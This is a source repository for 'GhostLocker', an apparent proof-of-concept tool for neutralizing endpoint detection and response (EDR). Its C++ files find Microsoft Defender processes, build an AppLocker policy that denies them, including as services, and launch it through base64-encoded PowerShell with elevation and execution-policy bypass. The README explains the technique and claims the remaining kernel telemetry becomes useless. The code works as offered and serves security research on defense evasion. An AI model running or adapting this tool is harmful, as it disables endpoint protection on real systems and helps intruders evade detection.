├── LICENSE
├── main_improved.cpp
├── main.cpp
├── README.md
└── ntdefs.h


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2025 Zero2504
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/main_improved.cpp:
--------------------------------------------------------------------------------
  1 | #include <Windows.h>
  2 | #include <iostream>
  3 | #include <string>
  4 | 
  5 | 
  6 | #define RED     "\x1b[31m"
  7 | #define GREEN   "\x1b[32m"
  8 | #define CYAN    "\x1b[36m"
  9 | #define YELLOW  "\x1b[33m"
 10 | #define RESET   "\x1b[0m"
 11 | 
 12 | 
 13 | 
 14 | // Can be extended 
 15 | const wchar_t* targetNames[] =
 16 | {
 17 | 
 18 |     L"MpDefenderCoreService.exe",
 19 |     L"MsMpEng.exe",
 20 |     L"WinDefend.exe"
 21 | };
 22 | 
 23 | const size_t targetCount = sizeof(targetNames) / sizeof(targetNames[0]);
 24 | 
 25 | 
 26 | const wchar_t* g_PowerShellBody = LR"(
 27 | 
 28 | 
 29 | # Only use if the service AppIDSvc and AppID is not enabled 
 30 | # sc.exe config AppID start=system
 31 | # sc.exe config AppIDSvc start=auto
 32 | # sc.exe start AppIDSvc
 33 | 
 34 | 
 35 | # No validation needed for wildcard paths like '*\MsMpEng.exe'
 36 | 
 37 | # Create unique GUIDs for static rules
 38 | $guidAllowExeSigned   = [guid]::NewGuid().ToString()
 39 | $guidAllowExeAllPath  = [guid]::NewGuid().ToString()
 40 | $guidAllowMsiSigned   = [guid]::NewGuid().ToString()
 41 | $guidAllowMsiAllPath  = [guid]::NewGuid().ToString()
 42 | $guidAllowScript      = [guid]::NewGuid().ToString()
 43 | $guidAllowAppx        = [guid]::NewGuid().ToString()
 44 | 
 45 | # Build dynamic block rules
 46 | $dynamicBlockRules = ''
 47 | 
 48 | foreach ($exe in $ExeToBlock) {
 49 |     $id   = [guid]::NewGuid().ToString()
 50 |     $name = Split-Path $exe -Leaf
 51 | 
 52 |     $dynamicBlockRules += '<FilePathRule Id="' + $id + '" Name="Block ' + $name + '" Description="Blocked by policy" UserOrGroupSid="S-1-5-18" Action="Deny">'
 53 |     $dynamicBlockRules += '<Conditions><FilePathCondition Path="' + $exe + '" /></Conditions>'
 54 |     $dynamicBlockRules += '</FilePathRule>'
 55 | }
 56 | 
 57 | $xml = @"
 58 | <AppLockerPolicy Version="1">
 59 | 
 60 |   <RuleCollection Type="Appx" EnforcementMode="NotConfigured">
 61 |     <FilePublisherRule Id="$guidAllowAppx" Name="Allow All Appx" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
 62 |       <Conditions>
 63 |         <FilePublisherCondition PublisherName="*" ProductName="*" BinaryName="*">
 64 |           <BinaryVersionRange LowSection="0.0.0.0" HighSection="*" />
 65 |         </FilePublisherCondition>
 66 |       </Conditions>
 67 |     </FilePublisherRule>
 68 |   </RuleCollection>
 69 | 
 70 |   <RuleCollection Type="Dll" EnforcementMode="NotConfigured" />
 71 | 
 72 |   <RuleCollection Type="Exe" EnforcementMode="Enabled">
 73 |     <FilePublisherRule Id="$guidAllowExeSigned" Name="Allow All Signed EXEs" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
 74 |       <Conditions>
 75 |         <FilePublisherCondition PublisherName="*" ProductName="*" BinaryName="*">
 76 |           <BinaryVersionRange LowSection="*" HighSection="*" />
 77 |         </FilePublisherCondition>
 78 |       </Conditions>
 79 |     </FilePublisherRule>
 80 | 
 81 | $dynamicBlockRules
 82 | 
 83 |     <FilePathRule Id="$guidAllowExeAllPath" Name="Allow All Other EXEs" Description="Fallback allow" UserOrGroupSid="S-1-1-0" Action="Allow">
 84 |       <Conditions>
 85 |         <FilePathCondition Path="*" />
 86 |       </Conditions>
 87 |     </FilePathRule>
 88 | 
 89 |     <RuleCollectionExtensions>
 90 |       <ThresholdExtensions><Services EnforcementMode="Enabled" /></ThresholdExtensions>
 91 |       <RedstoneExtensions><SystemApps Allow="Enabled" /></RedstoneExtensions>
 92 |     </RuleCollectionExtensions>
 93 |   </RuleCollection>
 94 | 
 95 |   <RuleCollection Type="Msi" EnforcementMode="NotConfigured">
 96 |     <FilePublisherRule Id="$guidAllowMsiSigned" Name="Allow All Signed MSIs" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
 97 |       <Conditions>
 98 |         <FilePublisherCondition PublisherName="*" ProductName="*" BinaryName="*">
 99 |           <BinaryVersionRange LowSection="*" HighSection="*" />
100 |         </FilePublisherCondition>
101 |       </Conditions>
102 |     </FilePublisherRule>
103 | 
104 |     <FilePathRule Id="$guidAllowMsiAllPath" Name="Allow All MSI Paths" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
105 |       <Conditions>
106 |         <FilePathCondition Path="*" />
107 |       </Conditions>
108 |     </FilePathRule>
109 |   </RuleCollection>
110 | 
111 |   <RuleCollection Type="Script" EnforcementMode="NotConfigured">
112 |     <FilePathRule Id="$guidAllowScript" Name="Allow All Scripts" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
113 |       <Conditions>
114 |         <FilePathCondition Path="*" />
115 |       </Conditions>
116 |     </FilePathRule>
117 |   </RuleCollection>
118 | 
119 | </AppLockerPolicy>
120 | "@
121 | 
122 | $tempPath = [System.IO.Path]::GetTempFileName()
123 | Set-Content -Path $tempPath -Value $xml -Encoding UTF8
124 | 
125 | Write-Host '[*] Applying AppLocker policy...'
126 | Set-AppLockerPolicy -XmlPolicy $tempPath -ErrorAction Stop
127 | 
128 | 
129 | Remove-Item $tempPath -Force
130 | gpupdate /force | Out-Null
131 | 
132 | Write-Host '[+] AppLocker policy applied. Blocked EXEs:' -ForegroundColor Green
133 | $ExeToBlock | ForEach-Object { Write-Host ('  -> ' + $_) -ForegroundColor Green }
134 | 
135 | Read-Host "Press ENTER to exit"
136 | )";
137 | 
138 | 
139 | 
140 | 
141 | std::wstring BuildPowerShellExeArray()
142 | {
143 |     if (targetCount == 0)
144 |         return L"@()";
145 | 
146 |     std::wstring result = L"@(";
147 |     for (size_t i = 0; i < targetCount; ++i)
148 |     {
149 |         result += L"\"*\\";
150 |         result += targetNames[i];
151 |         result += L"\"";
152 | 
153 |         if (i + 1 < targetCount)
154 |             result += L",";
155 |     }
156 |     result += L")";
157 |     return result;
158 | }
159 | 
160 | 
161 | std::wstring BuildFullPowerShellScript()
162 | {
163 |     std::wstring script;
164 |     std::wstring arrayExpr = BuildPowerShellExeArray();
165 | 
166 |     script += L"$ExeToBlock = ";
167 |     script += arrayExpr;
168 |     script += L"\n";
169 |     script += g_PowerShellBody;
170 | 
171 |     return script;
172 | }
173 | 
174 | std::wstring Base64Encode(const BYTE* data, size_t len)
175 | {
176 |     static const wchar_t* base64_chars =
177 |         L"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
178 | 
179 |     std::wstring result;
180 |     result.reserve((len + 2) / 3 * 4);
181 | 
182 |     for (size_t i = 0; i < len; i += 3)
183 |     {
184 |         unsigned char b1 = data[i];
185 |         unsigned char b2 = (i + 1 < len) ? data[i + 1] : 0;
186 |         unsigned char b3 = (i + 2 < len) ? data[i + 2] : 0;
187 | 
188 |         unsigned int triple = (b1 << 16) | (b2 << 8) | b3;
189 | 
190 |         result.push_back(base64_chars[(triple >> 18) & 0x3F]);
191 |         result.push_back(base64_chars[(triple >> 12) & 0x3F]);
192 | 
193 |         if (i + 1 < len)
194 |             result.push_back(base64_chars[(triple >> 6) & 0x3F]);
195 |         else
196 |             result.push_back(L'=');
197 | 
198 |         if (i + 2 < len)
199 |             result.push_back(base64_chars[triple & 0x3F]);
200 |         else
201 |             result.push_back(L'=');
202 |     }
203 | 
204 |     return result;
205 | }
206 | 
207 | 
208 | void RunPowerShellInMemory()
209 | {
210 |     
211 | 
212 |     std::wstring script = BuildFullPowerShellScript();
213 | 
214 |     // UTF-16LE → Bytes
215 |     const BYTE* bytes = reinterpret_cast<const BYTE*>(script.c_str());
216 |     size_t byteLen = script.size() * sizeof(wchar_t);
217 | 
218 |     std::wstring encoded = Base64Encode(bytes, byteLen);
219 | 
220 |     std::wstring params = L"-NoProfile -ExecutionPolicy Bypass -EncodedCommand ";
221 |     params += encoded;
222 | 
223 | 
224 |     ShellExecuteW(
225 |         NULL,
226 |         L"runas",            // Admin
227 |         L"powershell.exe",
228 |         params.c_str(),
229 |         NULL,
230 |         SW_SHOW
231 |     );
232 | }
233 | 
234 | 
235 | int main()
236 | {
237 | 
238 | 
239 |     std::wstring psArg = BuildPowerShellExeArray();
240 | 
241 |     if (psArg != L"@()")
242 |     {
243 |         wprintf(L"\n" CYAN L"[+] PowerShell Input: " RESET L"%ws\n", psArg.c_str());
244 |         RunPowerShellInMemory();
245 |     }
246 |     else
247 |     {
248 |         printf(RED "[-] No target executables defined.\n" RESET);
249 |     }
250 | 
251 |     getchar();
252 |     return 0;
253 | }
254 | 


--------------------------------------------------------------------------------
/main.cpp:
--------------------------------------------------------------------------------
  1 | #define _CRT_SECURE_NO_WARNINGS
  2 | 
  3 | #include <Windows.h>
  4 | #include <iostream>
  5 | #include <string>
  6 | #include "ntdefs.h"
  7 | #include <TlHelp32.h>
  8 | #include <vector>
  9 | 
 10 | 
 11 | 
 12 | #define RED     "\x1b[31m"
 13 | #define GREEN   "\x1b[32m"
 14 | #define CYAN    "\x1b[36m"
 15 | #define YELLOW  "\x1b[33m"
 16 | #define RESET   "\x1b[0m"
 17 | 
 18 | 
 19 | std::vector<std::wstring> g_Win32Paths;
 20 | 
 21 | // Can be extended 
 22 | const wchar_t* targetNames[] =
 23 | {
 24 | 
 25 |     L"MpDefenderCoreService.exe",
 26 |     L"MsMpEng.exe",
 27 |     L"WinDefend.exe",
 28 | };
 29 | 
 30 | const size_t targetCount = sizeof(targetNames) / sizeof(targetNames[0]);
 31 | 
 32 | 
 33 | const wchar_t* g_PowerShellBody = LR"(
 34 | 
 35 | 
 36 | # Only use if the service AppIDSvc and AppID is not enabled 
 37 | # sc.exe config AppID start=system
 38 | # sc.exe config AppIDSvc start=auto
 39 | # sc.exe start AppIDSvc
 40 | 
 41 | 
 42 | # Validate input paths
 43 | foreach ($exe in $ExeToBlock) {
 44 |     if (!(Test-Path $exe)) {
 45 |         Write-Host '[!] ERROR: File does not exist:' $exe -ForegroundColor Red
 46 |         exit 1
 47 |     }
 48 | }
 49 | 
 50 | # Create unique GUIDs for static rules
 51 | $guidAllowExeSigned   = [guid]::NewGuid().ToString()
 52 | $guidAllowExeAllPath  = [guid]::NewGuid().ToString()
 53 | $guidAllowMsiSigned   = [guid]::NewGuid().ToString()
 54 | $guidAllowMsiAllPath  = [guid]::NewGuid().ToString()
 55 | $guidAllowScript      = [guid]::NewGuid().ToString()
 56 | $guidAllowAppx        = [guid]::NewGuid().ToString()
 57 | 
 58 | # Build dynamic block rules
 59 | $dynamicBlockRules = ''
 60 | 
 61 | foreach ($exe in $ExeToBlock) {
 62 |     $id   = [guid]::NewGuid().ToString()
 63 |     $name = Split-Path $exe -Leaf
 64 | 
 65 |     $dynamicBlockRules += '<FilePathRule Id="' + $id + '" Name="Block ' + $name + '" Description="Blocked by policy" UserOrGroupSid="S-1-1-0" Action="Deny">'
 66 |     $dynamicBlockRules += '<Conditions><FilePathCondition Path="' + $exe + '" /></Conditions>'
 67 |     $dynamicBlockRules += '</FilePathRule>'
 68 | }
 69 | 
 70 | $xml = @"
 71 | <AppLockerPolicy Version="1">
 72 | 
 73 |   <RuleCollection Type="Appx" EnforcementMode="NotConfigured">
 74 |     <FilePublisherRule Id="$guidAllowAppx" Name="Allow All Appx" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
 75 |       <Conditions>
 76 |         <FilePublisherCondition PublisherName="*" ProductName="*" BinaryName="*">
 77 |           <BinaryVersionRange LowSection="0.0.0.0" HighSection="*" />
 78 |         </FilePublisherCondition>
 79 |       </Conditions>
 80 |     </FilePublisherRule>
 81 |   </RuleCollection>
 82 | 
 83 |   <RuleCollection Type="Dll" EnforcementMode="NotConfigured" />
 84 | 
 85 |   <RuleCollection Type="Exe" EnforcementMode="Enabled">
 86 |     <FilePublisherRule Id="$guidAllowExeSigned" Name="Allow All Signed EXEs" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
 87 |       <Conditions>
 88 |         <FilePublisherCondition PublisherName="*" ProductName="*" BinaryName="*">
 89 |           <BinaryVersionRange LowSection="*" HighSection="*" />
 90 |         </FilePublisherCondition>
 91 |       </Conditions>
 92 |     </FilePublisherRule>
 93 | 
 94 | $dynamicBlockRules
 95 | 
 96 |     <FilePathRule Id="$guidAllowExeAllPath" Name="Allow All Other EXEs" Description="Fallback allow" UserOrGroupSid="S-1-1-0" Action="Allow">
 97 |       <Conditions>
 98 |         <FilePathCondition Path="*" />
 99 |       </Conditions>
100 |     </FilePathRule>
101 | 
102 |     <RuleCollectionExtensions>
103 |       <ThresholdExtensions><Services EnforcementMode="Enabled" /></ThresholdExtensions>
104 |       <RedstoneExtensions><SystemApps Allow="Enabled" /></RedstoneExtensions>
105 |     </RuleCollectionExtensions>
106 |   </RuleCollection>
107 | 
108 |   <RuleCollection Type="Msi" EnforcementMode="NotConfigured">
109 |     <FilePublisherRule Id="$guidAllowMsiSigned" Name="Allow All Signed MSIs" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
110 |       <Conditions>
111 |         <FilePublisherCondition PublisherName="*" ProductName="*" BinaryName="*">
112 |           <BinaryVersionRange LowSection="*" HighSection="*" />
113 |         </FilePublisherCondition>
114 |       </Conditions>
115 |     </FilePublisherRule>
116 | 
117 |     <FilePathRule Id="$guidAllowMsiAllPath" Name="Allow All MSI Paths" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
118 |       <Conditions>
119 |         <FilePathCondition Path="*" />
120 |       </Conditions>
121 |     </FilePathRule>
122 |   </RuleCollection>
123 | 
124 |   <RuleCollection Type="Script" EnforcementMode="NotConfigured">
125 |     <FilePathRule Id="$guidAllowScript" Name="Allow All Scripts" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
126 |       <Conditions>
127 |         <FilePathCondition Path="*" />
128 |       </Conditions>
129 |     </FilePathRule>
130 |   </RuleCollection>
131 | 
132 | </AppLockerPolicy>
133 | "@
134 | 
135 | $tempPath = [System.IO.Path]::GetTempFileName()
136 | Set-Content -Path $tempPath -Value $xml -Encoding UTF8
137 | 
138 | Write-Host '[*] Applying AppLocker policy...'
139 | Set-AppLockerPolicy -XmlPolicy $tempPath -ErrorAction Stop
140 | 
141 | 
142 | Remove-Item $tempPath -Force
143 | gpupdate /force | Out-Null
144 | 
145 | Write-Host '[+] AppLocker policy applied. Blocked EXEs:' -ForegroundColor Green
146 | $ExeToBlock | ForEach-Object { Write-Host ('  -> ' + $_) -ForegroundColor Green }
147 | 
148 | Read-Host "Press ENTER to exit"
149 | )";
150 | 
151 | 
152 | 
153 | typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
154 |     SYSTEM_INFORMATION_CLASS SystemInformationClass,
155 |     PVOID                    SystemInformation,
156 |     ULONG                    SystemInformationLength,
157 |     PULONG                   ReturnLength
158 |     );
159 | 
160 | std::wstring ForceHarddiskVolumeToC(const std::wstring& ntPath)
161 | {
162 |     const std::wstring prefix = L"\\Device\\HarddiskVolume3\\";
163 | 
164 |     if (ntPath.rfind(prefix, 0) == 0)
165 |     {
166 |         
167 |         std::wstring rest = ntPath.substr(prefix.length());
168 |         return L"C:\\" + rest;
169 |     }
170 | 
171 |     return ntPath; 
172 | }
173 | 
174 | 
175 | bool FuncNtQuerySystemInformation(ULONGLONG PID)
176 | {
177 |     NTSTATUS status;
178 | 
179 |     HMODULE ntdll = GetModuleHandleA("ntdll.dll");
180 |     if (!ntdll)
181 |         return false;
182 | 
183 |     _NtQuerySystemInformation NtQuerySystemInformation =
184 |         (_NtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");
185 | 
186 |     if (!NtQuerySystemInformation)
187 |         return false;
188 | 
189 |     void* allocBuffer = LocalAlloc(LMEM_FIXED | LMEM_ZEROINIT, 1024);
190 |     if (!allocBuffer)
191 |         return false;
192 | 
193 |     SYSTEM_PROCESS_ID_INFORMATION spi = { 0 };
194 |     spi.ProcessId = PID;
195 |     spi.ImageName.MaximumLength = 1024;
196 |     spi.ImageName.Buffer = (PWSTR)allocBuffer;
197 | 
198 |     status = NtQuerySystemInformation(
199 |         SystemProcessIdInformation,
200 |         &spi,
201 |         sizeof(spi),
202 |         0
203 |     );
204 | 
205 |     if (status != 0)
206 |     {
207 |         printf(RED "    [-] Query failed (NTSTATUS: 0x%08X)\n" RESET, status);
208 |         LocalFree(allocBuffer);
209 |         return false;
210 |     }
211 | 
212 |     
213 |     std::wstring originalPath(spi.ImageName.Buffer, spi.ImageName.Length / sizeof(WCHAR));
214 | 
215 |  
216 |    
217 |     std::wstring ntPath(spi.ImageName.Buffer, spi.ImageName.Length / sizeof(WCHAR));
218 |     std::wstring win32Path = ForceHarddiskVolumeToC(ntPath);
219 | 
220 |     g_Win32Paths.push_back(win32Path);
221 | 
222 |     printf(YELLOW "    ImagePath (NT):     " RESET "%ws\n", ntPath.c_str());
223 |     printf(YELLOW "    ImagePath (Win32):  " GREEN "%ws\n" RESET, win32Path.c_str());
224 | 
225 | 
226 |     LocalFree(allocBuffer);
227 |     return true;
228 | }
229 | 
230 | 
231 | bool isTargetProcess(const wchar_t* exeName)
232 | {
233 |     for (size_t i = 0; i < targetCount; i++)
234 |     {
235 |         if (_wcsicmp(exeName, targetNames[i]) == 0)
236 |             return true;
237 |     }
238 |     return false;
239 | }
240 | 
241 | void findTargetsAndQueryPaths()
242 | {
243 |     HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
244 |     if (snap == INVALID_HANDLE_VALUE)
245 |         return;
246 | 
247 |     PROCESSENTRY32W pe;
248 |     pe.dwSize = sizeof(pe);
249 | 
250 |     if (Process32FirstW(snap, &pe))
251 |     {
252 |         do
253 |         {
254 |             if (isTargetProcess(pe.szExeFile))
255 |             {
256 |                 printf(
257 |                     GREEN "[+] Found Target Process\n" RESET
258 |                     YELLOW "    Name:  " RESET "%ws\n"
259 |                     YELLOW "    PID:   " RESET "%lu\n",
260 |                     pe.szExeFile,
261 |                     pe.th32ProcessID
262 |                 );
263 |                 printf("\n");
264 |                 FuncNtQuerySystemInformation(pe.th32ProcessID);
265 |             }
266 | 
267 |         } while (Process32NextW(snap, &pe));
268 |     }
269 | 
270 |     CloseHandle(snap);
271 | }
272 | 
273 | std::wstring BuildPowerShellArray()
274 | {
275 |     if (g_Win32Paths.empty())
276 |         return L"";
277 | 
278 |     std::wstring output;
279 | 
280 |     for (size_t i = 0; i < g_Win32Paths.size(); i++)
281 |     {
282 |         output += L"\\\"" + g_Win32Paths[i] + L"\\\"";
283 | 
284 |         if (i + 1 < g_Win32Paths.size())
285 |             output += L","; 
286 |     }
287 | 
288 |     return output;
289 | }
290 | 
291 | std::wstring BuildPowerShellExeArray()
292 | {
293 |     if (g_Win32Paths.empty())
294 |         return L"@()";
295 | 
296 |     std::wstring result = L"@(";
297 |     for (size_t i = 0; i < g_Win32Paths.size(); ++i)
298 |     {
299 |         result += L"\"";
300 |         result += g_Win32Paths[i];
301 |         result += L"\"";
302 | 
303 |         if (i + 1 < g_Win32Paths.size())
304 |             result += L",";
305 |     }
306 |     result += L")";
307 |     return result;
308 | }
309 | 
310 | 
311 | std::wstring BuildFullPowerShellScript()
312 | {
313 |     std::wstring script;
314 |     std::wstring arrayExpr = BuildPowerShellExeArray();
315 | 
316 |     script += L"$ExeToBlock = ";
317 |     script += arrayExpr;
318 |     script += L"\n";
319 |     script += g_PowerShellBody;
320 | 
321 |     return script;
322 | }
323 | 
324 | std::wstring Base64Encode(const BYTE* data, size_t len)
325 | {
326 |     static const wchar_t* base64_chars =
327 |         L"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
328 | 
329 |     std::wstring result;
330 |     result.reserve((len + 2) / 3 * 4);
331 | 
332 |     for (size_t i = 0; i < len; i += 3)
333 |     {
334 |         unsigned char b1 = data[i];
335 |         unsigned char b2 = (i + 1 < len) ? data[i + 1] : 0;
336 |         unsigned char b3 = (i + 2 < len) ? data[i + 2] : 0;
337 | 
338 |         unsigned int triple = (b1 << 16) | (b2 << 8) | b3;
339 | 
340 |         result.push_back(base64_chars[(triple >> 18) & 0x3F]);
341 |         result.push_back(base64_chars[(triple >> 12) & 0x3F]);
342 | 
343 |         if (i + 1 < len)
344 |             result.push_back(base64_chars[(triple >> 6) & 0x3F]);
345 |         else
346 |             result.push_back(L'=');
347 | 
348 |         if (i + 2 < len)
349 |             result.push_back(base64_chars[triple & 0x3F]);
350 |         else
351 |             result.push_back(L'=');
352 |     }
353 | 
354 |     return result;
355 | }
356 | 
357 | 
358 | void RunPowerShellInMemory()
359 | {
360 |     if (g_Win32Paths.empty())
361 |     {
362 |         printf("[-] No Win32 paths collected, skipping PowerShell.\n");
363 |         return;
364 |     }
365 | 
366 |     std::wstring script = BuildFullPowerShellScript();
367 | 
368 |     const BYTE* bytes = reinterpret_cast<const BYTE*>(script.c_str());
369 |     size_t byteLen = script.size() * sizeof(wchar_t);
370 | 
371 |     std::wstring encoded = Base64Encode(bytes, byteLen);
372 | 
373 |     std::wstring params = L"-NoProfile -ExecutionPolicy Bypass -EncodedCommand ";
374 |     params += encoded;
375 | 
376 | 
377 |     ShellExecuteW(
378 |         NULL,
379 |         L"runas",            // Admin
380 |         L"powershell.exe",
381 |         params.c_str(),
382 |         NULL,
383 |         SW_SHOW
384 |     );
385 | }
386 | 
387 | 
388 | int main()
389 | {
390 | 
391 |     findTargetsAndQueryPaths();
392 | 
393 |     std::wstring psArg = BuildPowerShellArray();
394 | 
395 |     if (!psArg.empty())
396 |     {
397 |         wprintf(L"\n" CYAN L"[+] PowerShell Input: " RESET L"%ws\n", psArg.c_str());
398 |         RunPowerShellInMemory();
399 |     }
400 |     else
401 |     {
402 |         printf(RED "[-] No paths found.\n" RESET);
403 |     }
404 | 
405 |     getchar();
406 | 
407 |     return 0;
408 | }
409 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # GhostLocker: AppLocker-Based EDR Neutralization
  2 | 
  3 | ## Introduction
  4 | 
  5 | After my article on **Fairy-Law**, where I used kernel mitigations to disable Endpoint Detection & Response (EDR) solutions, [diversenok](https://github.com/diversenok) pointed out that IFEO exclusions (Image File Execution Options) were too invasive for third-party applications. This led to a better approach: leveraging the inherent power administrators already possess through **AppLocker**.
  6 | 
  7 | The concept was inspired by [diversenok](https://github.com/diversenok), who highlighted that administrators can legitimately control any software on their systems. From that insight, I developed a technique using AppLocker as a native Windows control mechanism. This research explores the **technical implementation of AppLocker for EDR control**, comparing it with **WDAC** and presenting a practical proof-of-concept tool.
  8 | 
  9 | ---
 10 | 
 11 | ## AppLocker: Application Whitelisting Architecture
 12 | 
 13 | AppLocker was introduced with **Windows 7** and enhanced in **Windows 8.1, 10 (Enterprise)** and **Windows Server 2012/R2/2016+**. It is an **application whitelisting framework** that allows administrators to define precisely which executables, scripts, or installers may execute for specific users or groups.
 14 | 
 15 | ### Internal Architecture (Windows Internals Perspective)
 16 | 
 17 | #### User-Mode & Kernel Components:
 18 | 
 19 | **AppIDSvc (Application Identity Service)**
 20 | - Runs under `LocalService` account
 21 | - Monitors registry changes to AppLocker policy paths
 22 | - Translates XML-based rule definitions into binary SDDL (Security Descriptor Definition Language)
 23 | - Communicates policy updates to kernel driver via DeviceIoControl
 24 | 
 25 | **AppID.sys (Kernel Driver)**
 26 | - Intercepts process creation events through callback mechanisms
 27 | - Performs rule evaluation using `SeSrpAccessCheck`
 28 | - Optionally monitors DLL loads (disabled by default for performance reasons)
 29 | 
 30 | > **Clarification:**  
 31 | > While `AppID.sys` performs rule evaluation in kernel mode, DLL enforcement is not autonomous.  
 32 | > The kernel driver does not actively monitor DLL loads by itself. Instead, user-mode components must explicitly query the driver via IOCTL to determine whether a DLL load is permitted.  
 33 | > As a result, AppLocker DLL rules effectively act as a client-side protection mechanism.
 34 | 
 35 | 
 36 | ### Rule Types and Enforcement
 37 | 
 38 | AppLocker supports two primary rule categories:
 39 | 
 40 | **Allow Rules**: Explicitly permit defined applications to execute
 41 | 
 42 | **Deny Rules**: Explicitly block defined applications from executing
 43 | - Deny rules always take precedence over allow rules
 44 | - Can include exceptions for specific conditions
 45 | - Support user and group-level targeting
 46 | 
 47 | ### Rule Criteria (AppID Attributes):
 48 | 
 49 | - **Path-based rules**: `C:\Program Files\Security\*.exe`
 50 | - **Hash-based rules**: SHA256 Authenticode hash validation
 51 | - **Publisher rules**: Digital signature, version, product name verification
 52 | - **File attribute rules**: Company name, product version, etc.
 53 | 
 54 | ### Registry Storage Locations:
 55 | 
 56 | ```
 57 | HKLM\Software\Policies\Microsoft\Windows\SrpV2     (XML policy storage, persistent)
 58 | HKLM\SYSTEM\CurrentControlSet\Control\Srp\Gp\Exe  (SDDL binary format, active enforcement)
 59 | HKLM\SYSTEM\CurrentControlSet\Control\AppID\CertStore (Certificate cache)
 60 | ```
 61 | 
 62 | ### Service & SYSTEM Process Enforcement (Often Overlooked)
 63 | 
 64 | By default, AppLocker does **not enforce rules on services or SYSTEM processes**.  
 65 | There is no graphical user interface option to enable this behavior.
 66 | 
 67 | Enforcement for services can only be enabled via the XML policy using `RuleCollectionExtensions`.
 68 | 
 69 | The following policy section is required to enforce AppLocker rules on services:
 70 | 
 71 | 
 72 | ```
 73 | <RuleCollectionExtensions>
 74 |   <ThresholdExtensions>
 75 |     <Services EnforcementMode="Enabled"/>
 76 |   </ThresholdExtensions>
 77 |   <RedstoneExtensions>
 78 |     <SystemApps Allow="Enabled"/>
 79 |   </RedstoneExtensions>
 80 | </RuleCollectionExtensions>
 81 | ```
 82 | As indicated by the extension names, these options are supported only on Windows 10+ and are not available on earlier versions.
 83 | See [Microsoft - AppLocker rule collection extensions](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/applocker/rule-collection-extensions)
 84 | 
 85 | ### Enforcement Flow:
 86 | 
 87 | 1. Windows notifies AppID driver on process creation
 88 | 2. `AppID.sys` evaluates application attributes
 89 | 3. Based on AppLocker rules, it allows or blocks the process
 90 | 4. **If blocked, process creation is aborted with `STATUS_ACCESS_DISABLED_BY_POLICY_OTHER`**
 91 | 
 92 | ### Critical Limitation:
 93 | 
 94 | ⚠️ **AppLocker does NOT terminate running processes.**
 95 | 
 96 | AppLocker enforcement only applies to new process creation events. Already-running EDR processes continue executing until system reboot. This is a fundamental architectural constraint.
 97 | 
 98 | **Kernel Driver Telemetry Caveat:**
 99 | 
100 | Even after blocking EDR userland executables, kernel drivers (`*.sys`) remain active and operational. These drivers continue:
101 | - Registering kernel callbacks (process, thread, image load, registry)
102 | - Collecting telemetry data
103 | - Monitoring system events
104 | 
105 | However, extensive testing reveals that this telemetry becomes functionally ineffective. Without userland analysis engines, correlation systems, and reporting mechanisms, the raw telemetry data cannot be processed into actionable detections. EDR solutions rely heavily on userland components for:
106 | - Event correlation and behavioral analysis
107 | - Machine learning inference
108 | - Alert generation and response orchestration
109 | - Communication with management consoles
110 | 
111 | ---
112 | 
113 | ## GhostLocker: Proof-of-Concept Implementation
114 | 
115 | ### Tool Overview
116 | 
117 | **GhostLocker** is a C++ implementation that automates AppLocker policy deployment to block EDR executables. 
118 | 
119 | ### Technical Implementation Analysis
120 | #### Implementation Variants
121 | 
122 | GhostLocker provides two implementation variants:
123 | 
124 | #### `main.cpp` – Dynamic Enumeration Version
125 | This version enumerates running processes and resolves their full image paths using native APIs (`NtQuerySystemInformation`).  
126 | The resolved absolute paths are then used to generate precise AppLocker deny rules.
127 | 
128 | The tool uses `CreateToolhelp32Snapshot` with `TH32CS_SNAPPROCESS` to enumerate all running processes. It compares process names against a predefined target list using case-insensitive matching (`_wcsicmp`).
129 | 
130 | **Why this approach?**
131 | - Lightweight and fast enumeration
132 | - No elevated privileges required for reading process list
133 | - Case-insensitive matching handles naming variations
134 | 
135 | #### 1. Process Enumeration (`FindTargetsAndQueryPaths`)
136 | 
137 | ```cpp
138 | const wchar_t* targetNames[] = {
139 |     L"MpDefenderCoreService.exe",
140 |     L"MsMpEng.exe",
141 |     L"WinDefend.exe",
142 |     L"EDR_Component_Name.exe",
143 | };
144 | ```
145 | 
146 | #### 2. Path Resolution via NtQuerySystemInformation
147 | 
148 | ```cpp
149 | SYSTEM_PROCESS_ID_INFORMATION spi = { 0 };
150 | spi.ProcessId = PID;
